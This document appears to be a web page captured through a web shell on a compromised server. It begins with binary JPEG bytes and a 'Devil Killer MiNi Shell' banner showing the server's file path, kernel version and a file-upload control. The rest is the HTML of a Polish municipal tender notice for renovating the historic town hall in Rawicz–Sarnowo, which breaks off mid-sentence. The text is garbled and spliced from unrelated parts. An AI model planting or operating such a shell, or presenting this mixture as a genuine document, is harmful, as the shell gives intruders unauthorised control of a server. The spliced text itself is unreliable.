JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20240109/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20240109/0001962501-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Rewitalizacja zabytkowego ratusza w Rawiczu – Sarnowie - etap 1 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA RAWICZ</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 411050729</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Marszałka Józefa Piłsudskiego 21</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Rawicz</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">63-900</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL417 - Leszczyński</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@rawicz.eu</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">bip.rawicz.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Rewitalizacja zabytkowego ratusza w Rawiczu – Sarnowie - etap 1 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-7327dc46-ae2c-11ee-a06e-7a3efa199397</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00019625</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-01-09</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00018070/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Rewitalizacja zabytkowego ratusza w Rawiczu - Sarnowie - etap 1</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/transakcja/871607 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/transakcja/871607</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1) Ofertę, oświadczenie o którym mowa w art. 125 ust. 1 składa się pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.2) Sposób sporządzania oraz sposób przekazywania podmiotowych środków dowodowych, przedmiotowych środków dowodowych, oraz innych informacji, oświadczeń lub dokumentów, przekazywanych w postępowaniu o udzielenie zamówienia publicznego został określony w rozporządzeniu w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej. 3)Komunikacja w niniejszym postępowaniu w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między Zamawiającym a Wykonawcą odbywa się przy użyciu środków komunikacji elektronicznej za pośrednictwem Platformy Zakupowej na stronie internetowej prowadzonego postępowania, o której mowa w rozdziale I SWZ.4) Komunikacja ustna dopuszczalna jest jedynie w toku<br/>negocjacji lub dialogu oraz w odniesieniu do informacji, które nie są istotne.5) Zamawiający awaryjnie dopuszcza komunikowanie się z Wykonawcami za pośrednictwem poczty elektronicznej przetargi@rawicz.eu – powyższe nie dotyczy składania oferty, z tym że podstawowym środkiem komunikowania się jest Platforma Zakupowa, o której wyżej mowa. W takim przypadku wszelką korespondencję do Zamawiającego związaną z niniejszym postępowaniem należy kierować do Zamawiającego, podając numer sprawy lub nazwę zadania podaną na wstępie.6) Wykonawca może się kontaktować z Zamawiającym w formie elektronicznej za pośrednictwem Platformy Zakupowej i formularzy: a) „Złóż ofertę” w odniesieniu do składania oferty lub wniosku. b) „Wyślij wiadomość” w odniesieniu do pozostałej korespondencji kierowanej do Zamawiającego 7)Zamawiający określa: a) niezbędne wymagania sprzętowe: stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kbit/s; zainstalowana dowolna przeglądarka internetowa: Internet Explorer, Chrome lub FireFox w najnowszej dostępnej wersji, z włączoną obsługą języka Javascript, akceptująca pliki typu „cookies”. W przypadku Internet Explorer minimalnie wersja 10.0; komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów operacyjnych – MS Windows 7, mac Os x 10 4,Linux, lub ich nowsze wersje; Platforma Zakupowa jest zoptymalizowana dla minimalnej rozdzielczości ekranu 1024x768 pikseli; latformazakupowa.pl działa według standardu przyjętego w komunikacji sieciowej – kodowanie UTF8,b) informacje na temat kodowania i czasu odbioru danych: oznaczenie czasu odbioru danych przez Platformę Zakupową stanowi przypiętą do dokumentu elektronicznego datę oraz dokładny czas (hh:mm:ss), znajdujące się na potwierdzeniu. Czas wyświetlany na platformazakupowa.pl synchronizuje się automatycznie z serwerem Głównego Urzędu Miar; za chwilę złożenia uznaje się moment wpływu informacji na platformę c) Zamawiający informuje, że występuje limit objętości plików lub spakowanych folderów: w zakresie całej oferty: do ilości 10 plików lub spakowanych folderów przy maksymalnej wielkości 150 MB; przy komunikacji poprzez wyślij wiadomość: do ilości 10 plików lub spakowanych folderów przy maksymalnej sumarycznej wielkości 500 MB8) Zamawiający w zakresie: a) pytań technicznych dotyczących funkcjonowania i obsługi technicznej Platformy Zakupowej wskazuje kontakt z Centrum Wsparcia Klienta, które dostępne jest od poniedziałku do piątku w godz.: od 7:00 do 17:00 pod numerem telefonu (22)-101-02-02 lub email- cwk@platformazakupowa.pl,b) pytań merytorycznych wyznaczył następujące osoby uprawnione do komunikowania się z Wykonawcą: w zakresie procedury przetargowej: A. Głowacz ; w zakresie przedmiotu zamówienia: E.Skrzypek, M.Handke .9) Pozostałe wymagania i zalecenia zostały zawarte w rozdziale XII SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzula informacyjna wynikająca z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, została określona w SWZ – rozdział XXIV pkt 4.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">nie dotyczy</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ON.2710.14.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia są roboty budowlane polegające na rewitalizacji zabytkowego ratusza w Rawiczu – Sarnowie – etap 1. Zadanie należy wykonać zgodnie z założeniami i wytycznymi zawartymi w dokumentacjach projektowych (realizacja 1 etapu), realizowanych w ramach zadania określonego w uchwale budżetowej pn.: „Rewitalizacja zabytkowego ratusza w Rawiczu - Sarnowie” zgodnie z zakresem i zapisami wynikającymi z niniejszej SWZ wraz z załącznikami.<br/><br/>2.	Zakres prac przy realizacji zamówienia w ramach etapu 1 obejmuje wykonanie wszelkich robót budowlanych zgodnie z obowiązującymi przepisami, w tym prac polegających na odnowieniu wnętrz i elewacji wieży ratuszowej, odnowieniu elewacji ratusza, wymianie stolarki okiennej i drzwiowej, wykonaniu niezbędnych prac elektrycznych w obiekcie i opaski wokół budynku oraz wymianie rynien i rur spustowych, w szczególności:<br/><br/>1)	Branża budowlana:<br/>a)	Parter: wykucie gniazd dla belek stalowych i obsadzenie belek stalowych wraz z obróbką, przebicie otworów wentylacji i wykonanie wentylacji wraz z obróbką,<br/>b)	Poddasze: montaż okien dachowych wraz z obróbkami i uzupełnieniami pokrycia dachowego,<br/>c)	Remont wieży: prace w zakresie podestów drewnianych, odgrzybianie, wymiana, impregnacja, malowanie posadzki, zamiana lokalizacji mechanizmu zegara z podestu drewnianego na poziom stropu nad I piętrem, <br/>d)	Remont wieży: prace z zakresie ścian, odbicie tynków, ręczne wykonanie obrzutki, ręczne tynkowanie tynkami renowacyjnymi, gruntowanie powierzchni, malowanie dwukrotne farbami silikatowymi,<br/>e)	Wymiana stolarki okiennej i drzwiowej, wykucie ościeżnic, wykucie podokienników wewnętrznych i zewnętrznych, wywiezienie i utylizacja gruzu, osadzenie okien drewnianych, zespolonych, dwuszybowych montaż drzwi aluminiowych EI60, montaż drzwi drewnianych malowanych proszkowo płycinowych wraz z ościeżnicą (stolarkę okienną oraz drzwiową wykonać zgodnie z wytycznymi konserwatora zabytków oraz projektem technicznym), montaż podokienników drewnianych, obróbki z blachy tytan-cynk,<br/>f)	Wykonanie opaski wokół budynku: rozebranie chodników, wysepek i przejść dla pieszych, wykopy ścianach pionowych przy odkrywaniu ścian fundamentowych, roboty ziemne wraz z transportem urobku, składowanie ziemi, profilowanie i zagęszczanie mechaniczne, wykonanie ławy betonowej pod obrzeże betonowe, obrzeże betonowe, ułożenie ścieków drogowych korytkowych, wykonanie opaski żwirowej wokół budynku wraz z podbudową z kruszywa kamiennego,<br/>g)	Wymiana rynien i rur spustowych: rozbiórka rynien, rozbiórka murów ogniowych, okapów, kołnierzy, gzymsów itp. – pas pod/nad rynnowy, rozbiórka pokrycia z dachówki karpiówki układanej podwójnie – wzdłuż okapu w celu wymiany obróbek blacharskich oraz koryt papowych, wymiana desek czołowych, obróbki z blachy z tytan-cynku, odtworzenie pokrycia dachowego dachówką karpiówką cementową podwójną, montaż rynien dachowych z blachy tytan-cynk, zbiorniczków przy rynnach, rynien spustowych z blachy tytan-cynk,<br/>h)	Zakup i montaż podwójnych budek lęgowych dla wróbli,<br/>i)	Wykonanie jednospadowego zadaszenia nad wejściem ze szkła hartowanego o konstrukcji aluminiowej,<br/>j)	Remont elewacji zewnętrznej: elewacja tynkowana, ustawienie rusztowań, rozbiórka murków ogniowych, okapów, kołnierzy, gzymsów itp. – obróbka gzymsu, obróbki z blachy tytan-cynk,<br/>k)	Wykonanie poziomej izolacji przeciwwilgociowej – wykonanie iniekcji polimerowo cementowej (sposób wykonania zgodnie z dokumentacją techniczną),<br/>l)	Elewacja tynkowana: uzupełnienie tynków zewnętrznych kategorii III z zaprawy wapiennej lub cementowo-wapiennej, miejscowe uzupełnienie zmurszałych tynków – wykonanie tynków renowacyjnych,<br/>m)	Renowacja portalu wejściowego zgodnie z dokumentacją projektową oraz zaleceniami konserwatora zabytków,<br/>n)	Renowacja ściany attyki nad portalem wejściowym zgodnie z zaleceniami konserwatora zabytków,<br/>o)	Odbicie tynków wewnętrznych na ścianach, filarach, pilastrach z zaprawy cementowo-wapiennej, miejscowe uzupełnienia tynku ościeża, belki, słupki, pilastry,<br/>p)	Wykonanie tynków zewnętrznych zwykłych kategorii III z zaprawy cementowo-wapiennej na ościeżach, belkach, słupach i pilastrach, wraz z miejscowym uzupełnieniem zmurszałych tynków – wykonanie tynków renowacyjnych,<br/>q)	Gruntowanie powierzchni pionowych, malowanie elewacji farbą silikatową podwójnie krzemionkującą,<br/>r)	Ustawienie rusztowań fasadowych ramowych,<br/>s)	Usunięcie z budynku gruzu, wywiezienie i utylizacja,<br/>t)	Wieża: wykonanie systemowego rusztowania przestrzennego wieży ratusza wraz z ewentualną rozbiórką pokrycia dachowego na czas wykonania robót,<br/>u)	Wieża: przygotowanie starego podłoża pod docieplenie metodą lekką-mokrą poprzez oczyszczenie mechaniczne i zmycie, oczyszczenie wątku ceglanego wieży murowanej w technologii TERMOPARY z detergentem lub miejscowo pastą z kwaśnym fluorem amonu, zgodnie z wytycznymi konserwatorskimi,<br/>v)	Naprawa uszkodzonych cegieł z powierzchni zabytkowych murów 1 cegły, 2-3 cegieł – uzupełnienie ubytków ceglanych wg wzoru i rodzaju cegły istniejącej,<br/>w)	Spoinowanie murów z wystrojem architektonicznym z cegły gotyckiej - uzupełnienie brakującej fugi,<br/>x)	Hydrofibizacja przez malowanie ręczne preparatem hydrofobowym podłoży mineralnych powierzchni z cegły przy renowacji starego budownictwa,<br/>y)	Renowacja stalowych istniejących elementów wieży zgodnie z zaleceniami konserwatora zabytków: np. tarcza zegarowa, sterczniki, iglice itp.<br/>z)	Renowacja istniejących figur świętych wraz z godłem miasta zgodnie z zaleceniami konserwatora zabytków,<br/>aa)	Renowacja biforiów, pinaklów z kwiatonami oraz pozostałych elementów dekoracyjnych wieży zgodnie z zaleceniami konserwatora zabytków,<br/>bb)	inne prace towarzyszące prawidłowemu wykonaniu zamówienia.<br/><br/>2)	Branża elektryczna:<br/>a)	Trasy kablowe: rura elektroinstalacyjna, wykucie bruzd dla przewodów i kabli instalacji elektrycznej wraz z ich zaprawieniem zaprawą cementowo-wapienną, uszczelnienie przepustów i przejść przez ściany p.poż masą ognioochronną wraz z oznaczeniem, przepusty systemowe,<br/>b)	Przewody i kable elektroenergetyczne: montaż przewodów kablowych układanych w bruzdach, ułożenie kabli elektroenergetycznych,<br/>c)	montaż rozdzielnicy elektrycznej RG z kompletem wyposażenia i okablowaniem wewnętrznym, montaż podtynkowy, <br/>d)	montaż tablicy ratusza TR wraz z kompletem wyposażenia i okablowaniem wewnętrznym, montaż podtynkowy, montaż złącza pomiarowego ZP wraz z kompletem wyposażenia i okablowaniem wewnętrznym, rozdzielnica stojąca,<br/>e)	wykonanie analizy parametrów sieci,<br/>f)	zamontowanie przekładników prądowych,<br/>g)	montaż opraw oświetleniowych zgodnie z projektem<br/>h)	montaż opraw awaryjnych zgodnie z projektem,<br/>i)	montaż opraw ewakuacyjnych zgodnie z projektem,<br/>j)	osprzęt elektroinstalacyjny: przygotowanie podłoża pod osprzęt instalacyjny, zamontowanie czujnika ruchu i obecności – zgodnie z opisem i ustaleniami z Zamawiającym, montaż gniazd wtykowych oraz puszek podtynkowych – zgodnie z opisem i ustaleniami z Zamawiającym,<br/>k)	Przeciwpożarowy wyłącznik prądu: roboty przygotowawcze, montaż urządzeń i przewodów,<br/>l)	Instalacja odgromowa i uziemienia: montaż uziomów lub przewodów uziemiających – bednarka, montaż przewodów instalacji odgromowej, uchwyty dystansowe, przewody odprowadzające, zaciski krzyżowe, złącza kontrolne w instalacji odgromowej – montaż na elewacji, elastyczne elementy łączeniowe, wykonanie badań i pomiarów, zabezpieczenia antykorozyjne, wraz z pracami towarzyszącymi,<br/>m)	Instalacje elektryczne zewnętrzne: wykonanie głównej linii zasilającej (przepust uszczelniony, kopanie rowów dla kabli, nasypanie warstwy piasku, ułożenie rury osłonowej sztywnej, zamontowanie dławic czopowych, ułożenie kabli, zasypanie rowów),<br/>n)	Instalacja oświetlenia iluminacyjnego: montaż opraw oświetleniowych na ścianach budynku zgodnie z projektem wraz ze źródłem światłą i materiałami montażowymi,<br/>o)	System monitoringu awaryjnego oświetlenia ewakuacyjnego (jednostka sterująca monitoringu oświetlenia awaryjnego – parametry zgodne z projektem, rozdzielacz sygnału, przewody kablowe),<br/>p)	Prace demontażowe,<br/>q)	Pomiary elektryczne wraz ze sporządzeniem protokołów,<br/>r)	Szkolenia, uruchomienia, instrukcje, dokumentacja powykonawcza,<br/>s)	Bruzdowanie pod kable w ścianach i zaprawienie bruzd po wykonanych pracach oraz odtworzenie powierzchni do stanu pierwotnego,<br/>t)	Elementy nieujęte, a niezbędne do całkowitego zrealizowania zakresu robót - inne prace towarzyszące prawidłowemu wykonaniu zamówienia.<br/><br/>3)	Wszystkie inne prace towarzyszące niezbędne do prawidłowej realizacji zamówienia.<br/><br/>4. Zaleca się, aby Wykonawca przed sporządzeniem oferty dokonał wizji lokalnej w celu zapoznania się <br/>z obiektem a także zdobył na swoją własną odpowiedzialność i ryzyko, wszelkie dodatkowe informacje, które mogą być konieczne do przygotowania oferty oraz podpisania umowy i wykonania zamówienia. Termin wizji lokalnej należy ustalić telefonicznie z osobą nadzorującą inwestycję – Panem Michałem Handke. Koszt dokonania wizji lokalnej ponosi Wykonawca.<br/>5. UWAGA: Rozliczenie ryczałtowe inwestycji. Zakres prac do wykonania w ramach niniejszego zamówienia (etapu 1) określają załączone przedmiary wraz z kosztorysami zerowymi. Przedmiary robót / kosztorysy zerowe mają charakter orientacyjny – stanowią jedynie dokumenty pomocnicze w celu ustalenia ceny ofertowej. Wykonawca sam dokona oceny ostatecznego zakresu w oparciu o dokumentacje projektowe i zalecaną wizję w terenie.<br/>6. Szczegółowy opis przedmiotu zamówienia został zawarty w rozdziale III SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45223000-6 - Roboty budowlane w zakresie konstrukcji</p> <p class="mb-0">45260000-7 - Roboty w zakresie wykonywania pokryć i konstrukcji dachowych i inne podobne roboty specjalistycze</p> <p class="mb-0">45430000-0 - Pokrywanie podłóg i ścian</p> <p class="mb-0">45410000-4 - Tynkowanie</p> <p class="mb-0">45420000-7 - Roboty w zakresie zakładania stolarki budowlanej oraz roboty ciesielskie</p> <p class="mb-0">45440000-3 - Roboty malarskie i szklarskie</p> <p class="mb-0">45311100-1 - Roboty w zakresie okablowania elektrycznego</p> <p class="mb-0">45311200-2 - Roboty w zakresie instalacji elektrycznych</p> <p class="mb-0">45315600-4 - Instalacje niskiego napięcia</p> <p class="mb-0">45315700-5 - Instalowanie stacji rozdzielczych</p> <p class="mb-0">45317300-5 - Elektryczne elektrycznych urządzeń rozdzielczych</p> <p class="mb-0">45232000-2 - Roboty pomocnicze w zakresie rurociągów i kabli</p> <p class="mb-0">45311000-0 - Roboty w zakresie okablowania oraz instalacji elektrycznych</p> <p class="mb-0">45314310-7 - Układanie kabli</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">13 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">1.	Zamawiający przewiduje udzielenia zamówień, o których mowa w art. 214 ust. 1 pkt 7 w związku z art. 305 pkt 1 ustawy stanowiących nie więcej niż 50% wartości zamówienia podstawowego i polegających na powtórzeniu podobnych robót budowlanych, w okresie 3 lat od udzielenia zamówienia podstawowego. W ramach tego zamówienia Zamawiający zleci wykonanie robót budowlanych nie objętych zamówieniem podstawowym w zakresie wykonania następujących prac: roboty ogólnobudowlane w tym roboty rozbiórkowe, roboty ziemne, instalacyjne, p-poż oraz inne prace towarzyszące pełnemu i prawidłowemu wykonaniu niniejszego zamówienia.<br/>2.	Zamówienie, o którym mowa w pkt 1 zostanie udzielone na następujących warunkach:<br/>1)	zamówienie zostanie udzielone po przeprowadzonych negocjacjach z Wykonawcą, któremu zostało udzielone zamówienie podstawowe,<br/>2)	Wykonawca zapewni nie gorszy standard wykonania zamówienia udzielonego w trybie art. 214 ust. 1 pkt 7 ustawy Pzp niż zamówienia podstawowego, <br/>3)	zamówienie zostanie udzielone, gdy Zamawiający zdecyduje o realizacji prac, o których mowa w pkt 1,<br/>4)	zamówienie, o którym mowa w art. 214 ust. 1 pkt 7 ustawy Pzp zostanie udzielone w okresie 3 lat od udzielenia zamówienia podstawowego, <br/>5)	termin wykonania zamówienia, o którym mowa w art. 214 ust. 1 pkt 7 ustawy Pzp zostanie ustalony przez Zamawiającego przed przystąpieniem do negocjacji.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający wybierze ofertę najkorzystniejszą na podstawie kryteriów oceny ofert określonych w rozdziale XIX 